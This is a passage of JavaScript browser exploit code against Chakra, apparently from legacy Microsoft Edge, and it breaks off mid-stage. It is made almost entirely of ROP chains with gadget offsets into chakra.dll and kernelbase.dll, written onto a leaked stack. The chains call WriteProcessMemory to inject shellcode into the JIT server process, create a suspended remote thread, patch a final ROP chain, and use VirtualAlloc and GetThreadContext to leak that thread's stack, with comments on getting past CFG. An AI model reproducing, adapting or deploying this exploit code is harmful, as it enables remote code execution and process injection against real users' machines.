	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();                                                                     // Recall RAX already has a writable pointer in it

	// LPVOID lpBaseAddress (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
	next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
	next();

	// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
	next();

	// Call KERNELBASE!WriteProcessMemory
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();

	// CreateRemoteThread() ROP chain
	// Stage 4 -> Create a thread within the JIT process, but create it suspended
	// This will allow the thread to _not_ execute until we are ready
	// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
	// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
	// We will update the thread later via another ROP chain to call SetThreadContext()

	// LPTHREAD_START_ROUTINE lpStartAddress (R9)
	// This can be any random data, since it will never be executed
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
	next();

	// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
	next();

	// SIZE_T dwStackSize (R8)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
	next();

	// Call KERNELBASE!CreateRemoteThread
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
	next(); 
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
	next();

	// WriteProcessMemory() ROP chain (Number 2)
    // Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget and pop rdi gadget
    // Comments about this occur at the beginning of the VirtualProtect ROP chain we will inject into the JIT process

    // Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // SIZE_T nSize (R9)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
    next();

    // HANDLE hProcess (RCX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
    next();

    // LPVOID lpBaseAddress (RDX)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
    next();                                                                       

    // LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
    next();

    // Call KERNELBASE!WriteProcessMemory
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
    next();

    // WriteProcessMemory() ROP chain (Number 3)
	// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

	// SIZE_T nSize (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// HANDLE hProcess (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
	next();

	// LPVOID lpBaseAddress (RDX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
	next();                                                                       

	// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
	next();

	// Call KERNELBASE!WriteProcessMemory
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
	next();

	// VirtualAlloc() ROP chain
	// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

	// DWORD flProtect (R9)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
	next();

	// LPVOID lpAddress (RCX)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
	next();

	// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
	next();

	// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
	next();

	// Call KERNELBASE!VirtualAlloc
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
	next();
	write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
	next();

	// GetThreadContext() ROP chain
    // Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

    // First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
    // The value we need to set is 0x10001F
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
    next();

    // HANDLE hThread
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
    next();

    // LPCONTEXT lpContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
    next();                                                                      
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
    next();

    // Call KERNELBASE!GetThreadContext
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
    next();

    // Locate store CONTEXT.Rsp and store it in .data of kernelbase.dll
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we stored CONTEXT.ContextFlags
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x4c37c5, chakraHigh);		// 0x1804c37c5: mov rax, qword [rcx] ; ret
    next();
    write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x26f73a, chakraHigh);       // 0x18026f73a: add rax, 0x68 ; ret
    next();
